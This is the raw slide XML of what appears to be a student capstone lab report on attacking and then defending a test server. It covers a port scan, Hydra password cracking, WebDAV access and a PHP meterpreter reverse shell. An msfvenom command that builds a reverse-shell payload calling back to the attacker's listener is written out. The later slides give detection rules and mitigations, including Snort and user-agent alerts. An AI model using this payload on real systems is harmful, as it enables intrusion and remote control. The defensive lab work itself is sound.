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Medium"/>
      <p:regular r:id="rId34"/>
      <p:bold r:id="rId35"/>
      <p:italic r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId38"/>
      <p:bold r:id="rId39"/>
      <p:italic r:id="rId40"/>
      <p:boldItalic r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto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4513AA-70C6-4EE7-986C-14EDB2FAD2FF}">
  <a:tblStyle styleId="{784513AA-70C6-4EE7-986C-14EDB2FAD2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RobotoLight-regular.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-italic.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-bold.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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e3dc08a68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e3dc08a68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e3dc08a68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e3dc08a68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e3dc08a68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e3dc08a68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e3dc08a68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e3dc08a68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e3dc08a68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e3dc08a68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7.pn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5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52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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66.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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59.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId5"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63.png"/><Relationship Id="rId4"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68.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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74.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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75.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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92.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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94.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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10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7.png"/><Relationship Id="rId4"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0.png"/><Relationship Id="rId4"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3.png"/><Relationship Id="rId4"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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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hyperlink" Target="http://192.168.1.105/company_folders/secret_folder/connect_to_corp_serv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8.png"/><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WebDAV</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1129" name="Google Shape;1129;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0" name="Google Shape;1130;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i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr b="1" i="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A reverse shell was created on the server exploiting the use of WebDAV</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Command that created the reverse php shell :</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i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt; shell.php</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1133" name="Google Shape;113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4" name="Google Shape;113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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1136" name="Google Shape;1136;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i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr b="1" i="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The attacking machine was used as a listener host and once the shell.php application was running it allowed for the attacker to gain root access to the Capstone VM via meterpreter.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1140" name="Google Shape;1140;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6076950" y="980425"/>
            <a:ext cx="2914649" cy="2428874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1141" name="Google Shape;1141;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3981802" y="3566650"/>
            <a:ext cx="5009798" cy="12203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47" name="Google Shape;1147;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48" name="Google Shape;1148;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54" name="Google Shape;1154;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55" name="Google Shape;1155;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418700" y="1036450"/>
            <a:ext cx="5943600" cy="1800225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1156" name="Google Shape;1156;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418700" y="3052750"/>
            <a:ext cx="5943600" cy="1647825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1157" name="Google Shape;1157;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6406625" y="1163250"/>
            <a:ext cx="26049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Port Scan happened at 6:58AM</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 total of 75540 packets were sent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Came from the Source IP 192.168.1.90</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There was a big spike in network traffic indicating a Port Scan.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63" name="Google Shape;1163;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64" name="Google Shape;1164;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273600" y="2896725"/>
            <a:ext cx="3990875" cy="1867525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1165" name="Google Shape;1165;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6362800" y="1040650"/>
            <a:ext cx="25929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Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> at 6:59:35 AM</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 total of 2 requests were made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file requested was connect_to_corp_server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file contained information on how to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to the server via WebDAB</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1166" name="Google Shape;1166;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="343000" y="812050"/>
            <a:ext cx="5943600" cy="201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72" name="Google Shape;1172;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73" name="Google Shape;1173;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371700" y="2882700"/>
            <a:ext cx="4020847" cy="1881550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6488950" y="1471600"/>
            <a:ext cx="2438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 total of 15,740 requests were made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Therefore it took a total of 15,738 hits before successfully cracking the password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1175" name="Google Shape;1175;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="762300"/>
            <a:ext cx="5878253" cy="2044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81" name="Google Shape;1181;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2" name="Google Shape;1182;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="376625" y="1334525"/>
            <a:ext cx="5943600" cy="2781300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="Google Shape;1183;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6432875" y="1513625"/>
            <a:ext cx="2578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 total of 36 requests were made to the WebDAV directory</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file accessed was shell.php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pic>
        <p:nvPicPr>
          <p:cNvPr id="1188" name="Google Shape;1188;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89" name="Google Shape;1189;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190" name="Google Shape;1190;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Mitigation: Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1196" name="Google Shape;1196;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7" name="Google Shape;1197;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507075" y="925000"/>
            <a:ext cx="7971900" cy="19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As a general rule of thumb the first action of an attack is to start by identifying host status by sending ICMP packets using ping scan. This will ping every node in the network to identify any live activity. Hence a snort alarm can be created to alert for this activity.</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In theory port scans trigger a large amount of requests to different ports / IP addresses within a short timespan. These can be detected counting the number of requested ports for each source IP address. As seen with the connections over time chart provided there is a clear spike in unique flow which indicates a port scan.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1198" name="Google Shape;1198;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1806125" y="2850975"/>
            <a:ext cx="2892912" cy="1995600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199" name="Google Shape;1199;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5213575" y="3153375"/>
            <a:ext cx="31254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Since the average flow is nearly zero the threshold will start at 100 within the hour.</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05" name="Google Shape;1205;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6" name="Google Shape;1206;p71"/>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None/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Create an alert that will capture the incoming traffic coming on the host (192.168.1.105) network for ICMP protocol.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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5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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The snort alert will look like this below</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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5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i="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>alert icmp any any -&gt; 192.168.1.105 any (msg: "NMAP ping sweep Scan)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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b="1" sz="15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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Once the unique flow threshold of 100 has been triggered send an alarm</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Google Shape;1207;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None/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-Once there is an unauthorized machine in the network that is conducting a ping sweep, lock it out of the system. </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="19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9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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-If the unique flow threshold of 100 has been triggered lock out the source IP from the system</a:t>
            </a:r>
            <a:endParaRPr sz="22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13" name="Google Shape;1213;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4" name="Google Shape;1214;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None/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Create an alert for anytime an unauthorized machine that attempts to access </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>company_folders/secret_folder/connect_to_corp_server</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;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2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Remove file &amp; directory from server</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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2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2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-Linux command :</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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2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i="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>rm -r company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr sz="23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21" name="Google Shape;1221;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2" name="Google Shape;1222;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2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Create an alert if the user_agent.original value includes Hydra</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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2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2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Also create an alert if there are more than 10 HTTP 401 Unauthorized errors from any server</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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2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2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-Determined </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>threshold is 10</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1223" name="Google Shape;1223;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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-Deny access if user_agent.original value includes Hydra</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-If a server returns more than 10 HTTP 401 errors then lock it out for an hour.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="23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29" name="Google Shape;1229;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0" name="Google Shape;1230;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2900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Create an alert if there is another machine accessing the WebDAV folder other than the original intended client</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231" name="Google Shape;1231;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1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-Restrict access to the WebDAV folder via firewall</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="19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9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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-Make the WebDAV folder inaccessible from a web interface</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="19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9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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Command to close the port from a linux server :</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="19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9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i="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>sudo ufw deny 80</a:t>
            </a:r>
            <a:endParaRPr sz="22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37" name="Google Shape;1237;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8" name="Google Shape;1238;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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-Create an alert for any traffic coming from port 444 since this is the default meterpreter port</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-Set an alert for any .php file uploaded to the server</a:t>
            </a:r>
            <a:endParaRPr sz="27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39" name="Google Shape;1239;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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Restrict users from uploading files from a web interface</a:t>
            </a:r>
            <a:endParaRPr sz="3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56300" y="742800"/>
